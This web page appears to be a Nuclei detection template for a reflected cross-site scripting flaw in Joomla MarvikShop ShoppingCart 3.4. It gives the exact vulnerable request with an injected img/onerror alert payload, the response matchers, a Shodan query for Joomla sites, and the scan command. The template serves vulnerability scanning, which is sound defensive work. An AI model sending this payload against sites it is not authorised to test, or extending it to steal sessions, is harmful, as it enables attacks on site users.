Skip to content

Joomla MarvikShop ShoppingCart 3.4 - Cross-Site Scripting

ID: joomla-marvikshop-xss

Severity: medium

Author: r3Y3r53

Tags: packetstorm,joomla,marvikshop,xss,unauth

Joomla MarvikShop ShoppingCart 3.4 is vulnerable to reflected xss where attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim’s session token or login credentials.

id: joomla-marvikshop-xss
info:
name: Joomla MarvikShop ShoppingCart 3.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Joomla MarvikShop ShoppingCart 3.4 is vulnerable to reflected xss where attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://packetstormsecurity.com/files/168598/Joomla-MarvikShop-ShoppingCart-3.4-Cross-Site-Scripting.html
- https://cxsecurity.com/issue/WLB-2022100015
- https://extensions.joomla.org/
metadata:
verified: true
max-request: 1
shodan-query: http.component:"Joomla"
tags: packetstorm,joomla,marvikshop,xss,unauth
http:
- method: GET
path:
- "{{BaseURL}}/?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po%3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217"
matchers:
- type: dsl
dsl:
- 'contains(body, "<img src=a onerror=alert(document.domain)>") && contains(body, "TEP STOP")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 490a0046304402202dbbb47d358f68eaa95564a1596dc4e5f93b6f4d754a3ad65c9144a6fd478b2f02207fff29bce4602d839b8f7a0304293eda110c0d47e1dc59fcc20afc1e4a52e62d:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/joomla/joomla-marvikshop-xss.yaml"

View on Github